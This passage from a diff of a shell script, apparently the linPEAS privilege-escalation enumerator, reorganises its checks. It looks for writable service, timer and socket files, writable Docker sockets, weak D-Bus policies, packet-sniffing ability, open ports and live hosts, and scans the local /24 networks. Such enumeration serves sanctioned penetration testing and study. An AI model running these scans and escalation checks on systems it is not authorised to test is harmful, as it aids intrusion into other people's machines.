/System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services +#-- PCS) Services +if [ "$EXTRA_CHECKS" ]; then print_2title "Services" print_info "Search for outdated versions" (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" echo "" - - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" - - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi - fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" - - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" - fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" - fi - done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" - #done - done - echo "" - - #-- PSC) .socket files - #TODO: .socket files in MACOS are folders - if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" - fi - socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi - done - socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi - done - done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - echo "" - - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) - fi - - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) - - # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do - perms="" - if [ -r "$l" ]; then - perms="Read " - fi - if [ -w "$l" ];then - perms="${perms}Write" - fi - if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; - else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 - fi - fi - done - echo "" - fi - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: identify allows in context="default" - done - done - fi - echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" - - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do + if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" + fi + done + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER" | while read t; do + if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" + fi + timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) + printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi + done + #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" + #for rp in "$relpath"; do + # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + #done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then + print_2title "Analyzing .socket files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done + done + if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" + fi + if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" + fi echo "" - #-- NI) /etc/inetd.conf + print_2title "Unix Sockets Listening" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + # Search sockets using netstat and ss + unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") + fi + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) + fi + + # But also search socket files + unix_scks_list2=$(find / -type s 2>/dev/null) + + # Detele repeated dockets and check permissions + (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi + fi + done + echo "" +fi + +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then + printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + + #TODO: identify allows in context="default" + done + done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then + busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi + fi + done +else echo_not_found "busctl" +fi +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q network_information; then +print_title "Network Information" +########################################### +#---------) Network Information (---------# +########################################### + +if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType + echo "" +fi + +#-- NI) Hostname, hosts and DNS +print_2title "Hostname, hosts and DNS" +cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null +warn_exec dnsdomainname 2>/dev/null +echo "" + +#-- NI) /etc/inetd.conf +if [ "$EXTRA_CHECKS" ]; then print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" echo "" +fi - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null - echo "" +#-- NI) Interfaces +print_2title "Interfaces" +cat /etc/networks 2>/dev/null +(ifconfig || ip a) 2>/dev/null +echo "" - #-- NI) Neighbours +#-- NI) Neighbours +if [ "$EXTRA_CHECKS" ]; then print_2title "Networks and neighbours" if [ "$MACOS" ]; then netstat -rn 2>/dev/null @@ -1968,134 +1940,138 @@ if echo $CHECKS | grep -q Net; then fi (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null echo "" +fi - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi +if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType +fi - #-- NI) Iptables +#-- NI) Iptables +if [ "$EXTRA_CHECKS" ]; then print_2title "Iptables rules" (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" echo "" +fi - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +#-- NI) Ports +print_2title "Active Ports" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +echo "" + +#-- NI) MacOS hardware ports +if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports echo "" - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi + print_2title "VLANs" + networksetup -listVLANs echo "" - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" - check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi + echo "" - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then - printf $RED"[-] $SCAN_BAN_BAD\n$NC" - echo "The network is not going to be scanned..." - - else - print_2title "Scanning local networks (using /24)" + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" - if ! [ "$PING" ] && ![ "$FPING" ]; then - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" - fi + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" - select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") - printf "%s\n" "$local_ips" | while read local_ip; do - if ! [ -z "$local_ip" ]; then - print_3title "Discovering hosts in $local_ip/24" - - if [ "$PING" ] || [ "$FPING" ]; then - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" +fi + +#-- NI) tcpdump +print_2title "Can I sniff with tcpdump?" +timeout 1 tcpdump >/dev/null 2>&1 +if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- NI) Internet access +if ! [ "$SUPERFAST" ] && [ "$EXTRA_CHECKS" ] && ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ]; then + printf $RED"[-] $SCAN_BAN_BAD\n$NC" + echo "The network is not going to be scanned..." + + else + print_2title "Scanning local networks (using /24)" + + if ! [ "$PING" ] && ! [ "$FPING" ]; then + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" + fi + + select_nc + local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + printf "%s\n" "$local_ips" | while read local_ip; do + if ! [ -z "$local_ip" ]; then + print_3title "Discovering hosts in $local_ip/24" + + if [ "$PING" ] || [ "$FPING" ]; then + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + fi + + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp + + sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips + rm $Wfolder/.ips.tmp 2>/dev/null + + while read disc_ip; do + me="" + if [ "$disc_ip" = "$local_ip" ]; then + me=" (local)" fi - discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp - - sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips - rm $Wfolder/.ips.tmp 2>/dev/null - - while read disc_ip; do - me="" - if [ "$disc_ip" = "$local_ip" ]; then - me=" (local)" - fi - - echo "Scanning top ports of ${disc_ip}${me}" - (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null - echo "" - done < $Wfolder/.ips - - rm $Wfolder/.ips 2>/dev/null + echo "Scanning top ports of ${disc_ip}${me}" + (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null echo "" - fi - done - fi + done < $Wfolder/.ips 